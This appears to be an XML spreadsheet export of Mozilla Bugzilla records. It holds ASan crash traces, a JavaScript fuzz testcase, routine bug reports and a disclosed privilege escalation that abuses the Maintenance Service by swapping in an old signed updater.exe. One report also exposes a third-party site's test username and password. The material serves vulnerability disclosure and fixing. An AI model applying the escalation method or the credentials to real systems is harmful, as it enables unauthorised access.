    #29 0x7fae89967562 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:130
    #30 0x7fae898dc22c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #31 0x7fae898dc22c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #32 0x7fae898dc22c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #33 0x7fae8eff0447 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #34 0x7fae9100b342 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:809
    #35 0x7fae898dc22c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #36 0x7fae898dc22c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #37 0x7fae898dc22c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #38 0x7fae9100aa21 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:644
    #39 0x48df67 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:231
    #40 0x7fae8641882f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #41 0x48cb3c in _start (/home/nils/fuzzer3/firefox/plugin-container+0x48cb3c)
0x621000a893de is located 3806 bytes inside of 4096-byte region [0x621000a88500,0x621000a89500)
allocated by thread T0 (Web Content) here:
    #0 0x475151 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x7fae964c475a in PL_ArenaAllocate /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/lib/ds/plarena.c:210
    #2 0x7fae8f805a82 in nsDisplayListBuilder::Allocate(unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:1062
    #3 0x7fae8fa8e71e in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:1359
    #4 0x7fae8fa8e71e in WrapSeparatorTransform /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2145
    #5 0x7fae8fa8e71e in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2479
    #6 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #7 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&amp;, nsRect const&amp;, nsLineList_iterator&amp;, int, int&amp;, nsDisplayListSet const&amp;, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #8 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #9 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #10 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #11 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&amp;, nsRect const&amp;, nsLineList_iterator&amp;, int, int&amp;, nsDisplayListSet const&amp;, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #12 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #13 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #14 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #15 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&amp;, nsRect const&amp;, nsLineList_iterator&amp;, int, int&amp;, nsDisplayListSet const&amp;, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #16 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #17 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #18 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #19 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&amp;, nsRect const&amp;, nsLineList_iterator&amp;, int, int&amp;, nsDisplayListSet const&amp;, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #20 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #21 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #22 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #23 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&amp;, nsRect const&amp;, nsLineList_iterator&amp;, int, int&amp;, nsDisplayListSet const&amp;, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #24 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #25 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #26 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #27 0x7fae8fa3692e in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsCanvasFrame.cpp:491
    #28 0x7fae8fa3af62 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2849
    #29 0x7fae8fb0214c in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsGfxScrollFrame.cpp:3379
    #30 0x7fae8fa3af62 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2849
    #31 0x7fae8fc7fd41 in ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsViewportFrame.cpp:61
SUMMARY: AddressSanitizer: use-after-poison /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4159 IsTransformSeparator
Shadow bytes around the buggy address:
  0x0c4280149220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c4280149270: 00 00 00 00 00 00 00 00 00 f7 f7[f7]f7 f7 f7 f7
  0x0c4280149280: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c4280149290: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c42801492a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c42801492b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c42801492c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5201==ABORTING</t>
        </is>
      </c>
      <c r="X1224" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" t="n">
        <v>1075546</v>
      </c>
      <c r="B1225" t="inlineStr">
        <is>
          <t>2014-10-01 07:06:28 -0700</t>
        </is>
      </c>
      <c r="C1225" t="inlineStr">
        <is>
          <t>Assertion failure: entry_ == makeIndex(clasp, key, kind), at vm/Runtime.h</t>
        </is>
      </c>
      <c r="D1225" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:25 -0700</t>
        </is>
      </c>
      <c r="E1225" t="n">
        <v>1</v>
      </c>
      <c r="F1225" t="n">
        <v>1</v>
      </c>
      <c r="G1225" t="n">
        <v>3</v>
      </c>
      <c r="H1225" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1225" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1225" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K1225" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1225" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1225" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1225" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1225" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1225" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main34+]</t>
        </is>
      </c>
      <c r="Q1225" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1225" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1225" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T1225" t="n">
        <v>1</v>
      </c>
      <c r="U1225" t="n">
        <v>0</v>
      </c>
      <c r="V1225" t="n">
        <v>17</v>
      </c>
      <c r="W1225" t="inlineStr">
        <is>
          <t>for (var i = 0; i &lt; 200; ++i) {
    Object.getOwnPropertyNames(undefined + "");
}
function p(s) {
    for (var i = 0; i &lt; s.length; i++) {
        s.charCodeAt(i);
    }
}
function m(f) {
    var a = [];
    for (var j = 0; j &lt; 700; ++j) {
        try {
            f()
        } catch (e) {
            a.push(e.toString());
        }
    }
    p(uneval(a));
}
f = Function("\
    function f() {\
        functionf\n{}\
    }\
    m(f);\
");
f();
f();
for (var x = 0; x &lt; 99; x++) {
    newGlobal()
}
asserts the following js debug shell on m-c changeset 6c824fbb73e8 with --no-asmjs --no-baseline --no-ion --no-threads at Assertion failure: entry_ == makeIndex(clasp, key, kind), at vm/Runtime.h.
https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2014-10-01-mozilla-central-debug/jsshell-mac64.zip
=== Tinderbox Build Bisection Results by autoBisect ===
The "good" changeset has the timestamp "20140930050920" and the hash "1de7e7a7ad8d".
The "bad" changeset has the timestamp "20140930052624" and the hash "f33f7dc50aa9".
Likely regression window: https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=1de7e7a7ad8d&amp;tochange=f33f7dc50aa9
Jon, is bug 1073577 a possible regressor? (Setting this as s-s because bug 1073577 is s-s.)</t>
        </is>
      </c>
      <c r="X1225" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" t="n">
        <v>502168</v>
      </c>
      <c r="B1226" t="inlineStr">
        <is>
          <t>2009-07-03 00:54:14 -0700</t>
        </is>
      </c>
      <c r="C1226" t="inlineStr">
        <is>
          <t>Duplicated content with &lt;embed&gt; inside table markup</t>
        </is>
      </c>
      <c r="D1226" t="inlineStr">
        <is>
          <t>2010-05-06 22:51:14 -0700</t>
        </is>
      </c>
      <c r="E1226" t="n">
        <v>1</v>
      </c>
      <c r="F1226" t="n">
        <v>1</v>
      </c>
      <c r="G1226" t="n">
        <v>3</v>
      </c>
      <c r="H1226" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1226" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1226" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1226" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1226" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1226" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1226" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1226" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1226" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1226" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1226" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1226" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1226" t="n">
        <v>1</v>
      </c>
      <c r="U1226" t="n">
        <v>0</v>
      </c>
      <c r="V1226" t="n">
        <v>33</v>
      </c>
      <c r="W1226" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
When you log on to any Fronter installation (used by 4 mio. users in EU) the images in the top navigation appears multiple times after upgrading to Firefox 3.5
This bug was not present in 3.11 or 3.10
Reproducible: Always
Steps to Reproduce:
1. log in to Fronter using the link below:
USERNAME: egh110787MELN
PASSWORD: egh110787MELN
2. Take a look at the images in the top navigation bar
FAST LOGON:
https://fronter.com/DK-test/index.phtml?username=egh110787MELN&amp;password=egh110787MELN&amp;newlang=de&amp;saveid=-1&amp;mainurl=main.phtml&amp;chp=&amp;USER_SCREEN_SIZE=
Actual Results:  
Images are displayed multiple times, hiding links behind. Making nativation impossible.
Expected Results:  
The images should be shown only once.
Take a look at the screenshot here:
http://frontersupport.dk/ERRORS/firefox_bug.jpg</t>
        </is>
      </c>
      <c r="X1226" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" t="n">
        <v>659485</v>
      </c>
      <c r="B1227" t="inlineStr">
        <is>
          <t>2011-05-24 16:03:22 -0700</t>
        </is>
      </c>
      <c r="C1227" t="inlineStr">
        <is>
          <t>[Mobile] Optimize /new for Mobile With Device Detection</t>
        </is>
      </c>
      <c r="D1227" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E1227" t="n">
        <v>1</v>
      </c>
      <c r="F1227" t="n">
        <v>1</v>
      </c>
      <c r="G1227" t="n">
        <v>5</v>
      </c>
      <c r="H1227" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1227" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1227" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1227" t="inlineStr">
        <is>
          <t>Firefox 4</t>
        </is>
      </c>
      <c r="L1227" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1227" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1227" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1227" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1227" t="inlineStr"/>
      <c r="Q1227" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1227" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1227" t="inlineStr">
        <is>
          <t>2.8</t>
        </is>
      </c>
      <c r="T1227" t="n">
        <v>1</v>
      </c>
      <c r="U1227" t="n">
        <v>0</v>
      </c>
      <c r="V1227" t="n">
        <v>39</v>
      </c>
      <c r="W1227" t="inlineStr">
        <is>
          <t>51% of mobile users start their session from this page. 
1) Can we redirect people on mobile devices to Firefox.com/m
2) Direct them to Firefox.com/m version most appropriate for their device:
   &gt;Android/Maemo (promote Android stable/beta)
   &gt;iOS (promote Firefox Home)
   &gt;Feature phone (learn more)</t>
        </is>
      </c>
      <c r="X1227" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" t="n">
        <v>1414853</v>
      </c>
      <c r="B1228" t="inlineStr">
        <is>
          <t>2017-11-06 08:01:26 -0800</t>
        </is>
      </c>
      <c r="C1228" t="inlineStr">
        <is>
          <t>Crash in nsDisplayImageContainer::ConfigureLayer</t>
        </is>
      </c>
      <c r="D1228" t="inlineStr">
        <is>
          <t>2017-12-13 11:14:16 -0800</t>
        </is>
      </c>
      <c r="E1228" t="n">
        <v>1</v>
      </c>
      <c r="F1228" t="n">
        <v>1</v>
      </c>
      <c r="G1228" t="n">
        <v>3</v>
      </c>
      <c r="H1228" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1228" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1228" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K1228" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1228" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1228" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N1228" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1228" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1228" t="inlineStr">
        <is>
          <t>[wr-mvp] [gfx-noted]</t>
        </is>
      </c>
      <c r="Q1228" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1228" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1228" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1228" t="n">
        <v>1</v>
      </c>
      <c r="U1228" t="n">
        <v>0</v>
      </c>
      <c r="V1228" t="n">
        <v>22</v>
      </c>
      <c r="W1228" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-32c5947b-f773-4bb3-9d47-c483c0171105.
=============================================================
Seen while looking at crash stats - not exactly sure where to bucket it: http://bit.ly/2ya3K8b
On 58 crashes started using 20171104100412. Install time indicates a few unique users crashed. Crash reason is EXCEPTION_ACCESS_VIOLATION_READ.</t>
        </is>
      </c>
      <c r="X1228" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" t="n">
        <v>1559182</v>
      </c>
      <c r="B1229" t="inlineStr">
        <is>
          <t>2019-06-13 09:41:49 -0700</t>
        </is>
      </c>
      <c r="C1229" t="inlineStr">
        <is>
          <t>Increased crash-stats permissions for droeh</t>
        </is>
      </c>
      <c r="D1229" t="inlineStr">
        <is>
          <t>2019-06-13 16:06:42 -0700</t>
        </is>
      </c>
      <c r="E1229" t="n">
        <v>1</v>
      </c>
      <c r="F1229" t="n">
        <v>1</v>
      </c>
      <c r="G1229" t="n">
        <v>4</v>
      </c>
      <c r="H1229" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1229" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1229" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1229" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1229" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1229" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1229" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1229" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1229" t="inlineStr"/>
      <c r="Q1229" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1229" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1229" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1229" t="n">
        <v>1</v>
      </c>
      <c r="U1229" t="n">
        <v>0</v>
      </c>
      <c r="V1229" t="n">
        <v>6</v>
      </c>
      <c r="W1229" t="inlineStr">
        <is>
          <t>I think having raw dump access will be helpful for investigating bug 1557449.</t>
        </is>
      </c>
      <c r="X1229" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" t="n">
        <v>1261849</v>
      </c>
      <c r="B1230" t="inlineStr">
        <is>
          <t>2016-04-04 08:03:02 -0700</t>
        </is>
      </c>
      <c r="C1230" t="inlineStr">
        <is>
          <t>Hello conversation opens while Firefox is in never remember history mode</t>
        </is>
      </c>
      <c r="D1230" t="inlineStr">
        <is>
          <t>2016-04-26 14:38:39 -0700</t>
        </is>
      </c>
      <c r="E1230" t="n">
        <v>1</v>
      </c>
      <c r="F1230" t="n">
        <v>1</v>
      </c>
      <c r="G1230" t="n">
        <v>6</v>
      </c>
      <c r="H1230" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1230" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J1230" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K1230" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1230" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1230" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1230" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1230" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1230" t="inlineStr">
        <is>
          <t>[btpp-fix-now][47]</t>
        </is>
      </c>
      <c r="Q1230" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1230" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1230" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1230" t="n">
        <v>1</v>
      </c>
      <c r="U1230" t="n">
        <v>0</v>
      </c>
      <c r="V1230" t="n">
        <v>10</v>
      </c>
      <c r="W1230" t="inlineStr">
        <is>
          <t>Created attachment 8737802
Screencast showing the issue
[Affected versions]:
- Firefox 45.0
- Firefox 46 beta 7
- latest Developer Edition 47.0a2
- latest Nightly 48.0a1
[Affected platforms]:
- Windows 7 64-bit
- Windows XP 32-bit
- Mac OS X 10.10.5
- Ubuntu 14.04 64-bit
[Steps to reproduce]:
1. Start Firefox
2. Start a conversation
3. Set Firefox not to remember history
(about:preferences#privacy)
4. Visit https://www.mozilla.org/en-US/firefox/hello/
5. Click 'Try hello' button
[Expected result]:
- Hello does not start a conversation.
[Actual result]:
- A conversation is started, conversation window does not open anywhere but if you click 'Try Firefox Hello' button again, Disconnect button is shown, but does nothing.
[Regression range]:
- Not sure if this is a regression range, will come with an update ASAP.
Though I think that this was since forever, it reproduces with 0.1 as well.
[Additional notes]:
- Screencast showing the issue attached</t>
        </is>
      </c>
      <c r="X1230" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" t="n">
        <v>1643199</v>
      </c>
      <c r="B1231" t="inlineStr">
        <is>
          <t>2020-06-03 16:51:42 -0700</t>
        </is>
      </c>
      <c r="C1231" t="inlineStr">
        <is>
          <t>Mozilla Maintenance Service Privilege Escalation via updater.exe if Firefox is installed in non-default location</t>
        </is>
      </c>
      <c r="D1231" t="inlineStr">
        <is>
          <t>2024-05-30 10:15:15 -0700</t>
        </is>
      </c>
      <c r="E1231" t="n">
        <v>1</v>
      </c>
      <c r="F1231" t="n">
        <v>1</v>
      </c>
      <c r="G1231" t="n">
        <v>3</v>
      </c>
      <c r="H1231" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1231" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1231" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1231" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1231" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1231" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1231" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1231" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1231" t="inlineStr">
        <is>
          <t>[sec-survey][post-critsmash-triage][adv-main80+][adv-esr68.12+][adv-esr78.2+]</t>
        </is>
      </c>
      <c r="Q1231" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1231" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1231" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T1231" t="n">
        <v>1</v>
      </c>
      <c r="U1231" t="n">
        <v>0</v>
      </c>
      <c r="V1231" t="n">
        <v>39</v>
      </c>
      <c r="W1231" t="inlineStr">
        <is>
          <t>Created attachment 9154016
poc.zip
This report is inspired by CVE-2019-11753 (Bug 1574980) and CVE-2017-7766 (Bug 1342742).
Summary: If a user has installed Firefox to a standard-user-writable location, then a local attacker who already has non-admin privilege can escalate his privilege to SYSTEM.
Detail: Since the Firefox installation path is user-writable, a local attacker can replace any files in the installation path. What we need to replace are `updater.exe` and `updater.ini`. Although the Maintenance Service checks if `updater.exe` contains an identity string and is signed by Mozilla, it doesn't check its file version. Thus, we can replace the currently installed `updater.exe` with an old and vulnerable version of `updater.exe`, and, from what I observed, the Maintenance Service copies the old `updater.exe` and `updater.ini` to `C:\Program Files (x86)\Mozilla Maintenance Service\update`, and then runs the old `updater.exe` with SYSTEM privilege.
The old `updater.exe` I choose to use is version 51.0.1, so that I can exploit Bug 1342742 again. (Actually exploiting the first part of Bug 1342742 is all we need, because we can edit `updater.ini` directly.)
